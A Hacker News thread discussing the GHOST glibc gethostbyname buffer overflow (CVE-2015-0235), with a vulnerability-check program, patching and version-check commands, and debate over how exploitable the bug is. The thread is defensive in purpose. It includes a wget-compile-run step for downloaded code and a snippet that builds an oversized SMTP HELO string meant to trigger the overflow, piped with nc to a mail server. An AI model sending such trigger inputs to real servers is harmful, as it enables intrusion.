CVE-2015-0235 – GHOST: glibc gethostbyname buffer overflow (openwall.com)
531 points by martius on Jan 27, 2015 | 241 comments



Here is the test program, from http://www.openwall.com/lists/oss-security/2015/01/27/9

https://gist.github.com/koelling/ef9b2b9d0be6d6dbab63

To test your system, simply run this (but obviously only after making sure gistfile1.c is clean ;))

    wget https://gist.githubusercontent.com/koelling/ef9b2b9d0be6d6dbab63/raw/de1730049198c64eaf8f8ab015a3c8b23b63fd34/gistfile1.c
    gcc gistfile1.c -o CVE-2015-0235
    ./CVE-2015-0235
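
For anyone who'd rather eyeball what they're about to compile, the core of the linked test (a reconstruction from the advisory's published program; the canary trick is the whole point) is roughly:

  #include <netdb.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <errno.h>

  #define CANARY "in_the_coal_mine"

  /* A 1 KB resolver buffer with a canary sitting right behind it. */
  struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
  } temp = { "buffer", CANARY };

  int main(void) {
    struct hostent resbuf;
    struct hostent *result;
    int herrno;

    /* An all-digits "hostname" sized so that the fixed parts plus the
       name exactly overrun the buffer on a vulnerable glibc. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];
    memset(name, '0', len);
    name[len] = '\0';

    int retval = gethostbyname_r(name, &resbuf, temp.buffer,
                                 sizeof(temp.buffer), &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0) {
      puts("vulnerable");        /* the canary got overwritten */
      exit(EXIT_SUCCESS);
    }
    if (retval == ERANGE) {
      puts("not vulnerable");    /* glibc correctly reported "buffer too small" */
      exit(EXIT_SUCCESS);
    }
    puts("should not happen");
    exit(EXIT_FAILURE);
  }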


I always laugh when people give you a URL to C code to test for remote code execution...


Why?

Reproducers are standard fare and it's not like the code in this case is obfuscated. Are magic code goblins going to come and invoke Ken Thompson's untrustable computing and make your computer install windows and join a botnet or something?


Because if you give someone a URL to C code and they run it, you have effectively gotten them to remotely execute your code ;-)


You're piping random executables from the internet without even looking at them to see what they do if you run that command.


There's no pipe involved in the GP's post. It downloads a source file, and the post even tells you to check the file before compiling. I actually copied and pasted the test code from the original advisory. Should I have typed it in with my own bare fingers to be more secure? I agree with your sentiment in general, you just picked the wrong example to bash here.


I was responding to the later posters who were confused as to why someone would laugh at seeing that. You're right that you said to check, and I wasn't trying to bash that post at all.

That aside, I actually did type it into my disposable VM. The theory being that if there was something subtle, it would force me either to type it wrong and not be exploited due to cognitive blindness or I'd catch the problem and avoid it.

I've read too many IOCCC entries and I probably am a bit paranoid.


The average Linux IT guy will not read the C code. Many of them wouldn't be able to really understand what it does either. And this is the best case: the code is simple and easy to grok.


If you're not reading the code you can just as well curl-and-pipe it. However, we run so much code on our computers that is trusted-by-association (oh, that's from apache.org, that's probably safe!) that it probably does not matter anyways.


    > You're piping random executables from the internet
    > without even looking at them to see what they do if you
    > run that command
... and then in your profile:

    > Just another Perl hacker.
You audit every CPAN module you install, line by line, right?


I agree, it is funny, but we run code we can't even see all day long. This is only 38 LOC. Anyone who is going to run it, however, should make sure they understand it.


You know you can also read the source code, right? Even if you are not proficient in C, you can understand what it's doing.


As opposed to code in some other language?


Might as well throw a --no-check-certificate in there


Anyone know how reliable that test is? I've got a system reporting not vulnerable but I'm not sure what glibc it has.


glibc 2.18 and greater were already patched, but it wasn't recognized as an RCE vulnerability at the time. See the first bullet under the "Mitigating factors" section in the link.

You can check your libc version with:

  ldd --version


I've got a system reporting glibc 2.11, but the test reports 'not vulnerable'.


We have already started to patch servers at Cloudways. Our CTO Pere Hospital explains how: http://www.cloudways.com/blog/ghost-vulnerability-patching/


All due respect, I think "explains that" would be more accurate than "explains how" here


True that Dampier. I wish I could edit it :(


Qualys Security Advisory: http://www.openwall.com/lists/oss-security/2015/01/27/9

Lots of info about their discovery. Apparently they developed a PoC exploit. They've also included a pretty short test program to determine if a system is vulnerable or not.

Here's a gist of the test (copied from their advisory): https://gist.github.com/amlweems/6e78d03810548b4867d6


    - At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit
      machines, and 8 bytes on 64-bit machines). Bytes can be overwritten
      only with digits ('0'...'9'), dots ('.'), and a terminating null
      character ('\0').

    - Despite these limitations, arbitrary code execution can be achieved.
      As a proof of concept, we developed a full-fledged remote exploit
      against the Exim mail server, bypassing all existing protections
      (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will
      publish our exploit as a Metasploit module in the near future.
Wow, that's actually amazing! I never would have thought it possible. As tonyhb says, it will be really interesting 'in the near future' to see how they managed to do it.


Does this mean it currently is only a problem for mail servers?


That's a great writeup. It will be really interesting to see how they achieve remote code execution under those limitations.

Also surprising to note that we've been vulnerable since November 2000.


They give it away (which I find moderately not nice of them) by saying they used Exim (the mail server) in their POC.


The default exim config seems to not be vulnerable.

I checked the configs on two of my systems, one default, and one heavily customized, neither had the helo verification turned on.


When the patches are available, you need to update, and likely reboot. Mattias Geniar talks about using the following command to find processes depending on libc, any of which could be running the vulnerable code; these are core processes that you probably cannot just cycle without a reboot [1]. For me the listing looks something like this: agetty, auditd, dbus-daem, dhclient, init, master, mysqld, rsyslogd, sshd, udevd, xinetd. Many of these deal with hostnames, so I would want to be sure everything is clean, and the best option is likely a reboot.

  lsof | grep libc | awk '{print $1}' | sort | uniq
[1] http://ma.ttias.be/critical-glibc-update-cve-2015-0235-getho...


They're only attacking host-lookup, so you just have to worry about people who can connect to your service and are able to control name server response. This means your network services that are internet-accessible. Everything else can wait for a maintenance window for the reboot.

  ~# netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u
  cupsd          
  dnsmasq        
  httpd          
  nmbd           
  ntpd           
  qemu-kvm       
  rpc.portmap    
  rpc.statd      
  sendmail: acce 
  smbd           
  ssh           
  sshd


It doesn't have to be internet accessible, AFAIK. If an attacker can get something to do arbitrary DNS lookups, I think it can be attacked. For instance, monitoring/log correlation software might be vulnerable.


If you have backend systems parsing XML, then an XXE[1] attack could trigger a DNS lookup, for example.

[1]https://www.owasp.org/index.php/XML_External_Entity_%28XXE%2...


Ooh, that could lead to some very interesting attack vectors. :D


sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'


For immediate actions, maybe also set 'UseDNS no' in /etc/ssh/sshd_config and restart any public-facing ssh servers.


This is a good idea in general. However, every version of ssh that I could test (going back to Ubuntu 8.04) uses getaddrinfo() rather than gethostbyname() and is therefore safe.


... or not necessarily safe, as people here claim that getaddrinfo() uses gethostbyname() under the covers.

"UseDNS no" in your sshd_config is a good idea in general.


Just remember that by default lsof prints only the first 9 characters of a process name, so processes with long names will be cut off. You can change how many initial characters lsof prints with the +c option, but often the kernel does not supply full names to lsof; for example, the limit on my box is 15 characters.

  lsof +c 64
  lsof: +c 64 > what system provides (15)

So "lsof +c 15" is the maximum.


That limit is set somewhere in the kernel but it's not clear if lsof is just setting that as a maximum internally or probing somewhere - I used strace -etrace='!close' lsof +c 64 but I couldn't see anything related to the limit.


Thank you, it's not always clear when a reboot is needed after an update. I do it with kernel updates but wouldn't have in this case until I read your comment and ran the command to check.

It would be nice if package managers would let us know when this is necessary; I expect that might be a hard thing to get right, though.


You can check to see if any running processes are using stale libraries pretty easily:

  sudo lsof | grep lib | grep DEL

You can then either reload those processes manually, or just bounce the box if that's easier.


There's also a rare chance that a program is statically linked, in which case upgrading glibc won't help, the program would need to be recompiled.


Yeah, that's a good point, and definitely worth mentioning, but obviously rebooting isn't going to help in that case either. The parent was asking about how they would know if they need to reboot or not.


It is nearly impossible to statically link glibc.


... with nss-modules being a major culprit, ironically... (on which gethostbyname relies greatly)...


[deleted]


You're testing what happens when you delete a file for which an open file descriptor exists. On Linux, a shared library will normally be memory-mapped but will not have a corresponding file descriptor. So lsof will show DEL, not (deleted).

I wouldn't normally nitpick about something like this, but if people follow your advice they might incorrectly think they don't need to reboot.


You can see that the removed file gets a (deleted) in the 'NAME' column but not DEL in the 'TYPE'.

Maybe you have a cut-and-paste error? The before and after look the same to me, no "(deleted)" to be seen.


Use ctrl-F to search; it got clipped off the right-hand side by HN's raw-mode display.


For debian, you can use "checkrestart -v" from the "debian-goodies" package.


  lsof | awk '/libc/{print $1 | "sort -u"}'

You're welcome.


This is the original report: https://sourceware.org/bugzilla/show_bug.cgi?id=15014

Upstream patch: https://sourceware.org/git/?p=glibc.git;a=commit;h=d5dd6189d... Full diff: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5dd6...

Red Hat bug: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235

Debian bug: https://bugs.debian.org/776391

Great write-up from the discoverer (Qualys): http://www.openwall.com/lists/oss-security/2015/01/27/9 - thanks amlweems! (https://news.ycombinator.com/item?id=8954069)

It looks like when an application calls a function of the gethostbyname()/gethostbyname_r() family but passes a buffer and a buffer length that is too short to store the result, the function sometimes fails to detect that there is not enough space, due to a miscalculation of how much space it needs, leading to a heap overflow. This means potentially arbitrary code execution!

Edit: Both the reentrant version (gethostbyname_r) and the non-reentrant one (gethostbyname) are affected (the non-reentrant one uses a fixed buffer length).

The scope of this vulnerability is huge! A lot of server applications attempt to resolve or reverse-resolve network clients' hostnames or IP addresses when a connection is established, so they would all be potentially vulnerable: the malicious client controlling his DNS records simply needs to return specially crafted hostname or address data that is too big to fit in the buffer. And this affects everything, no matter what language the server application is written in: C, Python, PHP, Java...

Edit #2: it looks like the bug was patched 2 years ago, but the fact it was exploitable was not understood until today, hence why a CVE was only assigned now.

Edit #3: Apps written in Golang are not vulnerable: https://news.ycombinator.com/item?id=8954011 - thanks 4ad!
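
To make the exposure pattern concrete, here's a minimal sketch (hypothetical server-side code, not taken from any real project) of the call that does the damage: any attacker-influenced string reaching gethostbyname() on an unpatched glibc is enough.

  #include <netdb.h>
  #include <stdio.h>

  int main(int argc, char **argv) {
    /* Stand-in for a hostname taken from a client (a HELO argument,
       a user-supplied URL, ...). On an unpatched glibc, a ~1 KB
       digits-and-dots string here overflows a heap buffer inside
       __nss_hostname_digits_dots(). */
    const char *name = (argc > 1) ? argv[1] : "example.org";

    struct hostent *he = gethostbyname(name);
    if (he == NULL) {
      herror("gethostbyname");
      return 1;
    }
    printf("resolved %s -> %s\n", name, he->h_name);
    return 0;
  }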


A note about Go. Go has its own DNS resolver, but unfortunately, if you compile natively, it's not enabled by default. It's only enabled if you cross-compile, or if you disable cgo, or if you rebuild the standard library with -tags netgo.

/edit: a second note about Go; even without the native resolver, Go uses getaddrinfo, not gethostbyname*, and it's not vulnerable.


So.... an application acts differently if it is cross-compiled? And if there's a vuln in the go resolver, binaries are "maybe" vulnerable, depending on whether they were cross-compiled or not?


I'm not sure why you were downvoted. In an ideal world, the behavior of the native Go resolver and the host resolver should be the same, but in the real world they might behave differently and might have different bugs. The nice thing about the native Go resolver is that it's written in a memory safe language which prohibits bugs like these.


The upstream patch is dated "Mon, 21 Jan 2013". Does this affect Redhat and Debian because they use older glibc versions and didn't backport this fix?


yes


What versions are affected? E.g. Ubuntu 14.04 appears to be on 2.19-0ubuntu6.5 (just updated). Does that include the fix?


You can check the libc version with:

dpkg -s libc6

For my Debian 7 servers it reports "Version: 2.13-38+deb7u7" after upgrading. Everything below that (eg. "*u6") is vulnerable. I don't know about the specific version numbers in Ubuntu though.

Edit: the fixed Ubuntu version is "2.15-0ubuntu10.10"


Per the Ubuntu security advisory for this, 14.04 is not impacted.


Full blog post coming, but 14.04 was never vulnerable. glibc 2.17 was the last vulnerable version.


The scope of this vulnerability is huge! A lot of server applications attempt to resolve or reverse-resolve network clients' hostnames or IP addresses when a connection is established, so they would all be potentially vulnerable: the malicious client controlling his DNS records simply needs to return specially crafted hostname or address data that is too big to fit in the buffer.

This overstates things a bit - hostnames that can be returned by the reverse DNS resolver can't trigger the vulnerability (maximum label length of 63). It needs to be a hostname supplied by a non-DNS method (eg. the POC uses the HELO SMTP command).
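
As a hedged illustration of that delivery route (the target MTA must actually verify HELO names, per the exim discussion above; host and port below are placeholders): the HELO argument is a raw client-supplied string, so it can be the kind of oversized digits-and-dots "hostname" that no real DNS response could ever produce.

  #include <stdio.h>
  #include <string.h>

  /* Emit an SMTP HELO line whose "hostname" is ~1 KB of digits --
     something DNS itself can never hand back, since labels cap at 63
     octets and names at 255. Try e.g.: ./helo | nc mail.example.com 25 */
  int main(void) {
    char helo[1100];
    memset(helo, '0', sizeof(helo) - 1);
    helo[sizeof(helo) - 1] = '\0';
    printf("HELO %s\r\n", helo);
    return 0;
  }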


> And this affects everything, no matter what language the server application is written in: C, Python, Golang, PHP, Java...

Assuming the runtime links to glibc, which unfortunately most do.


From https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235

"A heap-based buffer overflow was found in __nss_hostname_digits_dots(), which is used by the gethostbyname() and gethostbyname2() glibc function call. A remote attacker could use this flaw to execute arbitary code with the permissions of the user running the application."


Obligatory git link for the curious: https://sourceware.org/git/?p=glibc.git;a=blob;f=nss/digits_....

Note that this is a HEAD link, so if there are changes after I post this they should appear. I don't claim to have spotted the suspicious code (it's not ... super-accessible), just wanted to provide a link to the file in question.


I'm not fully through my morning bootup process and so not really ready to grok this, but can anyone give a quick summary of why gethostbyname() needs to hit the heap at all, let alone with a realloc call? There's a maximum hostname length, and it's not huge. Also: isn't this function just saying "yes" or "no" to a candidate hostname? Can't it just say "no" if the hostname is super long?


From the GNU coding standards:

> Avoid arbitrary limits on the length or number of any data structure, including file names, lines, files, and symbols, by allocating all data structures dynamically.


http://en.wikipedia.org/wiki/Hostname#Restrictions_on_valid_...

the entire hostname (including the delimiting dots but not a trailing dot) has a maximum of 253 ASCII characters

In general that is a good guideline, but when the standard (RFC1035) says there is an absolute limit, there is little value in going above that as it is likely that other systems won't be able to handle it. The added complexity of dynamic allocation is also an opportunity for bugs, like this one.


I think he's making fun of that glibc principle.

Again, this is especially silly if (as it appears to first glance) the bug is in a hostname validation function, and so flexible allocation could only ever be useful in the case of a hostname that must fail validation anyways.


In this case the bug isn't caused by dynamic allocation though, is it? The problem is the validation logic for detecting if the caller didn't allocate a big enough buffer when making the call.

In fact, it looks like if you get to the dynamic allocation section, it will fix the problem. One could argue that the whole problem stems from having a bug in a complex computation of buffer size to handle lots of different bits of data, rather than dynamically allocating the individual bits as needed.


gethostbyname() and friends fill in struct hostent:

  struct hostent {
        char  *h_name;            /* official name of host */
        char **h_aliases;         /* alias list */
        int    h_addrtype;        /* host address type */
        int    h_length;          /* length of address */
        char **h_addr_list;       /* list of addresses */
  }
The pointers in the structure point into the buffer. There could be any number of host aliases or IP addresses.
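
A small sketch of why the result size is open-ended: both arrays are NULL-terminated lists of pointers back into that same caller-supplied buffer.

  #include <arpa/inet.h>
  #include <netdb.h>
  #include <stdio.h>

  int main(void) {
    struct hostent *he = gethostbyname("localhost");
    if (he == NULL)
      return 1;

    /* Every alias and every address is another pointer into the result
       buffer, so the space needed varies from lookup to lookup. */
    for (char **a = he->h_aliases; *a != NULL; a++)
      printf("alias: %s\n", *a);
    for (char **p = he->h_addr_list; *p != NULL; p++)
      printf("addr:  %s\n", inet_ntoa(*(struct in_addr *)*p));
    return 0;
  }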


That's true and a good point, but not (it seems) applicable to this particular function, which validates whether or not the name is one of two fixed-sized formats, right?

(edit) You may be totally right here, by the way.


It looks like what's going on is that gethostbyname() calls __nss_hostname_digits_dots() which checks to see if the string you passed it was an IPv4 or IPv6 address rather than a name, and in that case it functions like inet_aton/inet_pton and converts the IP address string to a binary IP address as though the "name" 1.2.3.4 resolved to IP address 1.2.3.4.

In that specific case there are no aliases and exactly one IP address, but the buffer could still be too small (e.g. if caller-supplied with gethostbyname_r()).
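
A quick way to see that code path in action (no DNS server needs to be reachable for a numeric name):

  #include <netdb.h>
  #include <stdio.h>

  int main(void) {
    /* For a digits-and-dots "name", glibc short-circuits inside
       __nss_hostname_digits_dots() and never queries DNS: the string
       is simply converted, inet_aton-style, to a binary address. */
    struct hostent *he = gethostbyname("1.2.3.4");
    if (he != NULL)
      printf("h_name=%s h_length=%d aliases=%s\n",
             he->h_name, he->h_length,
             he->h_aliases[0] ? he->h_aliases[0] : "(none)");
    return 0;
  }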


[deleted]


Right, but they only need to do that computation because they're dynamically allocating storage. But the maximum size of a hostname is so small that hitting the allocator is costing them more than static allocation would.


All those home routers. All those home routers running Linux. All those home routers that are difficult to upgrade. All those home routers that will soon be part of some botnet or other?


Those (Linux-based) home routers usually use uclibc, which is not glibc.

Similarly, they usually use busybox ash as a shell and thus weren't vulnerable to shellshock.

Some do use openssl, so might still be affected by heartbleed.


Good point! Hooray for avoidance of software monocultures.

On the other hand, I shall now work hard to stop worrying about undiscovered vulnerabilities in uclibc.


But it is still C code, so...


If they aren't already a part of a botnet.


This looks like an "accident" by a PR agency:

http://www.frsag.org/pipermail/frsag/2015-January/005722.htm... Date: Tue 27 Jan 15:28:45 CET 2015

Half an hour after Red Hat lifted the embargo on the ticket: https://bugzilla.redhat.com/show_activity.cgi?id=1183461 2015-01-27 10:03:14 EST Removed: EMBARGOED CVE-2015-0235

If this is true this lady gets an award for best security disclosure this year ;-)



Looks like that function is marked as obsolete, anyone know how long that's been the case?

https://www.mankier.com/3/gethostbyname

"The gethostbyname(), gethostbyaddr(), herror(), and hstrerror() functions are obsolete. Applications should use getaddrinfo(3), getnameinfo(3), and gai_strerror(3) instead."


For a long time: getaddrinfo() and others are specified in SUSv3[1] (since 2003 I think). However, gethostbyname() and gethostbyaddr() are still very commonly used, and won't be gone soon.

1/ http://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB...


The main reason gethostbyname is deprecated is that it doesn't support IPv6. The implementation of getaddrinfo uses gethostbyname, so you're using it either way.


Well, Ulrich Drepper has been trying to get people to stop using it since 2007: https://udrepper.livejournal.com/16116.html

And not just because of IPv6.


That seems like a weak argument. It's still going to do the wrong thing when the local machine has a 10.x.x.x address and the local server has a 172.16.x.x address. The right solution is for the local admin to have the local DNS server return only the local address for local clients.

getaddrinfo() is also a much more complicated function than gethostbyname(). If you need the extra features, fine. If you're writing new code, fine. But going back and trying to update existing code is just going to introduce new bugs.


As a non-professional in the area of Linux security, let me share what I figured out while patching Ubuntu 12.04 servers for GHOST. In my situation at least, I got confused by looking for glibc and eglibc, which are listed as packages to be patched in http://people.canonical.com/~ubuntu-security/cve/2015/CVE-20....

I wanted to know what version of glibc and eglibc my servers were running so that I could check that they were getting updated. Running

   dpkg -s glibc 
and

   dpkg -s eglibc 
turned up nothing. How could that be since there had to be a C library?!

Answer: there are indeed compiled C libraries on my servers. I found that the key packages to update were related to libc6 (http://packages.ubuntu.com/precise/libc6), which were compiled from eglibc.

At any rate, I patched my servers with a typical procedure:

    sudo apt-get update 
    sudo unattended-upgrades
BTW, understanding that Ubuntu 12.04 uses eglibc and not glibc (http://askubuntu.com/questions/372864/why-ubuntu-uses-eglibc...) helped me make sense of the charts at http://people.canonical.com/~ubuntu-security/cve/2015/CVE-20..., especially the reason for the "DNE" (does not exist?) entry for Ubuntu 12.04 and glibc.

Hope this is clarifying to someone out there. Would love to hear confirmation or refutation of my reasoning here.


FYI, if you want to identify which package shipped a particular file:

    $ dpkg -S /lib/x86_64-linux-gnu/libc.so.6 
    libc6:amd64: /lib/x86_64-linux-gnu/libc.so.6
Hence 'libc6' is the package as you figured out.

If you want to see the status of a particular vulnerability in Debian, you can use the Security Tracker: https://security-tracker.debian.org/tracker/CVE-2015-0235 which links to the security advisory and tells you that the bug was fixed in version 2.13-38+deb7u7 of the package.

Note that any programs running before you upgraded the library will need to be restarted in order to use the fixed version. There's a program called checkrestart that will tell you which programs need to be restarted, or you can play it safe and reboot your system after applying library updates.


thanks especially for the tip about restarting the system, just in case.


Here is the full Qualys report with an in-depth analysis:

http://www.openwall.com/lists/oss-security/2015/01/27/9

Also contains a writeup about a remote Exim exploit (which is the default mail server on at least Debian).


    101       *buffer_size = size_needed;
    102       new_buf = (char *) realloc (*buffer, *buffer_size);
    103
    104       if (new_buf == NULL)
    105         {
    ...
    114           goto done;
    115         }
It's a shame they put that "..." there, because this looked like another potential vulnerability to me, or at least something I would look at very critically when reading this code (realloc fails, the caller's variable at buffer_size still gets assigned a larger value, and the next call thinks it has a larger buffer than it does). Line 110 assigns *buffer_size back to 0, so there is no such problem.
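
For reference, the usual shape of that defensive pattern (a generic sketch, not glibc's exact code; grow() is a made-up name): never advertise a size you failed to obtain.

  #include <stdlib.h>

  int grow(char **buffer, size_t *buffer_size, size_t size_needed) {
    char *new_buf = realloc(*buffer, size_needed);
    if (new_buf == NULL) {
      free(*buffer);
      *buffer = NULL;
      *buffer_size = 0;          /* what glibc's line 110 effectively does */
      return -1;
    }
    *buffer = new_buf;
    *buffer_size = size_needed;  /* commit the new size only on success */
    return 0;
  }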


From this, the vulnerability was fixed in May 2013, so any systems from then or later (e.g. Ubuntu 14.04) are fine. Older systems obviously now need to wait for the patches to come through.


If you are looking for date-based checking[1], August 2013 is when glibc 2.18 was released.[2]

[1] I wouldn't.

[2] http://ftp.gnu.org/gnu/glibc/


Most importantly, it contains a test program at the beginning of section 4.



Yes, the mail you link says:

"I will keep you posted in next hours. I send the notice to early. Big fail of my own. Stay tuned."


As far as I can tell, sshd has always used getaddrinfo() which is not vulnerable (rather than gethostbyname() which is). Can anyone confirm?

According to this comment: https://news.ycombinator.com/item?id=8954458 , getaddrinfo() uses gethostbyname() internally. So, is a default 'UseDNS yes' ssh setup vulnerable or not?


Even if it used gethostbyname(), I fail to understand how one would supply an invalid IP address to an sshd program. It calls an IP resolver after the TCP connection has been established, reading off the IP from there. From what I understood from their exim HELO example, one has to feed in a crazy IP "address" to gethostbyname() to trigger the bug.


Well, it obviously does getaddrinfo() on the incoming TCP connection to get the hostname (which is reported in the log, unless you have a 'UseDNS no' directive) -- and at least in my setup (which is mostly vanilla Debian), it seems to resolve that name again to an IP address, compare that to the IP address of the connection, and warn if it does not match.

Thus, an attacker controlling the PTR record for a given IP might provide a GHOST-compliant name in that PTR record; Then, connect to the ssh daemon, wait for it to read the PTR record - and if it gethostbyname() on it, it's game over.

Quite a few log processors would do that. The reason I'm worried specifically about sshd is that it is usually the only port ever listening to the world-and-not-firewalled on my servers (a non-standard one, at that - and only allowing public key authentication) - but despite this generally-regarded-as-secure setting, GHOST may prove it vulnerable.


But why would this malicious PTR record be fed into gethostbyname() again? At that point of getting a reverse lookup result, sshd is done checking.


To see that it resolves back to the IP address from which the connection is made. It's a standard check that many servers do, and ssh does too (and gives off a warning if they don't match). I'm not sure if it does it in a way that's vulnerable or not, though - but it surely does so by default.

From man sshd_config:

     UseDNS  Specifies whether sshd(8) should look up the
     remote host name and check that the resolved host name
     for the remote IP address maps back to the very same 
     IP address.  The default is “yes”.


Looks like this was still supposed to be embargoed. I feel sorry for the maintainers who now have to deal with this getting leaked...


RedHat has a fix for 6 and 7 now: https://rhn.redhat.com/errata/RHSA-2015-0092.html


Does anyone have any insight into when we'll see CentOS packages start hitting the mirrors?


Packages are ready, but if your mirror doesn't have them, use the manual way: http://systemz.pl/post/fast-ghost-fix-for-cve-2015-0235/ It's for CentOS 6.



They are now available; on CentOS 6.4, yum update glibc installs glibc-2.12-1.149.el6_6.5

changelog: * Mon Jan 19 2015 Siddhesh Poyarekar <siddhesh@redhat.com> - 2.12-1.149.5 - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183533).

Qualys GHOST program returns "not vulnerable" after the upgrade.


I just updated this on a CentOS 6 box, and it broke the server. After I rebooted, it never came online. Luckily it was a backup server, so it's not critical. Right now I'm just waiting for the customer to contact iweb to figure out what went wrong. This is a vanilla server with just some of my software installed (which couldn't possibly have prevented the server from rebooting).

Obviously there is some dependency that they forgot to add, so I would hold off on updating anything unless you don't really care if the server is offline for a while.


The problem was the iweb smart layer - they just needed to recreate the smart layer.


Apparently packages are built but currently awaiting signing + release. Hopefully within an hour or two they should hit the mirrors.


[deleted]


This is for https://rhn.redhat.com/errata/RHSA-2015-0016.html

This was related to iconv() and UTF8.

This is NOT the fix for this CVE.


That release seems to be dated 7 January 2015.


    Here is a list of potential targets that we investigated (they all call
    gethostbyname, one way or another), but to the best of our knowledge,
    the buffer overflow cannot be triggered in any of them:
    
    apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
    nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
    pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
    vsftpd, xinetd.
See "Re: Qualys Security Advisory CVE-2015-0235 - GHOST: glibc gethostbyname buffer overflow" <http://seclists.org/oss-sec/2015/q1/283>.


nginx on most supporting platforms (`NGX_HAVE_GETADDRINFO && NGX_HAVE_INET6`) uses `getaddrinfo(3)`.


Details on this one appear to be quite sparse - under what use cases would a remote user be able to craft invalid IP addresses?


It seems it was made public by accident, so it is not totally surprising that information is sparse :(


Given that I recently received a Debian Security Advisory which specifically addressed this CVE, I don't think it was accidental at all.


I think the timing was accidental due to leaking. The coordinated release became uncoordinated.


The embargo was cancelled half an hour after the leak.


I'm guessing vulnerable cases will be where string-encoded IP addresses are accepted from the network and passed directly to these functions, such as by web apps or things that take string-serialized encodings. This would allow an attacker to pass any string in as an IP address.


I'm curious on this one too. How exactly can this be exploited remotely? SSH trickery? If a PHP script is doing geolookups or resolving of user's IP's to hosts?

How do I make my hosts secure?


The example given in the article is an MTA, but I'm sure there are others.


We wrote a quick blog post on this. The main meaningful feature is a table of distros, versions, and whether they're not vulnerable, vulnerable but with a patch, or vulnerable with no patch yet. I am accepting requests for other distros, and of course if you have any corrections I'd love to hear them!

http://chargen.matasano.com/chargen/2015/1/27/vulnerability-...


So what I've figured out so far: this is quite a nasty bug that may or may not affect everything that links against glibc (or eglibc). However, the bug was fixed in glibc 2.18, and the advisory [1] includes a test program at the start of section 4. From this, Ubuntu 10.04 LTS and 12.04 LTS are affected, but not 14.04 LTS. (Can someone confirm this?)

[1] http://www.openwall.com/lists/oss-security/2015/01/27/9


14.04 and 13.10 are not vulnerable


Here is a diff removing the vulnerability: https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=nss/dig...


Is Ubuntu 12.04 vulnerable to this?

>> this vulnerability affects many systems from Linux glibc-2.2 version published on 10 November 2000.

>> a fix was pushed to glibc-2.17 and glibc-2.18

Running dpkg -l libc6 on 12.04.5 shows it's 2.15. So anything before 2.17 is vulnerable?

/lib/x86_64-linux-gnu/libc.so.6 GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.7) stable release version 2.15, by Roland McGrath et al.


According to Canonical it is: http://www.ubuntu.com/usn/usn-2485-1/


Blog post coming soon: 12.04 is vulnerable, but has a patch available.


I'm glad the moderator removed GHOST from the subject line. CVEs don't need a media-friendly handle.

Edit: It's back again. Booooo.


We disagree on that, especially when they're widespread (and you don't get much more widespread than glibc) and "drop everything and patch"-level severity.

Having a shorthand to refer to the bug makes it easier (and therefore more likely) for it to get referenced and discussed.


Having a shorthand makes it a lot easier for people to freak out and panic unnecessarily, too. "Heartbleed" was big enough to warrant a world-wide freakout, but this is a remote buffer overflow with many requirements for success.

From http://www.openwall.com/lists/oss-security/2015/01/27/9 :

  --[ 3 - Mitigating factors ]--------------------------------------------------

  The impact of this bug is reduced significantly by the following reasons:

  - A patch already exists (since May 21, 2013), and has been applied and
  tested since glibc-2.18, released on August 12, 2013:

  - The gethostbyname*() functions are obsolete; with the advent of IPv6,
  recent applications use getaddrinfo() instead.

  - Many programs, especially SUID binaries reachable locally, use
  gethostbyname() if, and only if, a preliminary call to inet_aton()
  fails. However, a subsequent call must also succeed (the "inet-aton"
  requirement) in order to reach the overflow: this is impossible, and
  such programs are therefore safe.

  - Most of the other programs, especially servers reachable remotely, use
  gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also
  known as full-circle reverse DNS) checks. These programs are generally
  safe, because the hostname passed to gethostbyname() has normally been
  pre-validated by DNS software:

  . "a string of labels each containing up to 63 8-bit octets, separated
    by dots, and with a maximum total of 255 octets." This makes it
    impossible to satisfy the "1-KB" requirement.

  . Actually, glibc's DNS resolver can produce hostnames of up to
    (almost) 1025 characters (in case of bit-string labels, and special
    or non-printable characters). But this introduces backslashes ('\\')
    and makes it impossible to satisfy the "digits-and-dots"
    requirement.
You would effectively have to control the DNS server, or spoof its responses, to get the software to accept a suitable exploit.


>You would effectively have to control the DNS server, or spoof its responses, to get the software to accept a suitable exploit

would you? If you want to exploit something that does unauthenticated gethostbyaddr(), then yes, for that you need to control a DNS server (which, btw, isn't harder than controlling a web server to serve malware with).

On the other hand, if you can make your target call gethostbyname() on an arbitrary string, you don't need to control a DNS server.

There are many sites out there that go and fetch user supplied URLs - for example to fetch picture previews.

First you exploit one of these, install a DNS server on them and then you can also exploit the ones which only do gethostbyaddr() :-)


Web servers serving malware are exploited in drive-by scanning; find a vuln in a webapp, drop your malware. It doesn't even take exploiting the system itself, and generally does not affect the web server at all. A DNS server would take much more work: you'd have to pwn it first, and then reconfigure the DNS server. Much more difficult.

Fetching a user-supplied URL is not enough to exploit remotely. You have to exploit the target's DNS resolver, because you have to feed it invalid or impossible records. All existing DNS resolvers will reject these because they break RFC.

It would be much easier to exploit a web app and drop your payload and exploit it locally, which is what everyone currently does to pwn servers with rootkits.


I think the parent comment was sarcastic.


I wasn't being sarcastic.

Adding a tagline, media-friendly name or keywords is unprofessional. Simply, severity is then ranked by how well the press or security bloggers can market the word, not by the respective severity of the CVE. It's a popularity contest, nothing more.

As someone who deals with every damn sensationalist story at a financial company, having every fucking client phone up about every damn marketoid creation even if it doesn't affect our platform detracts from doing real work.

Let's play their trick:

It's the X Factor of security.


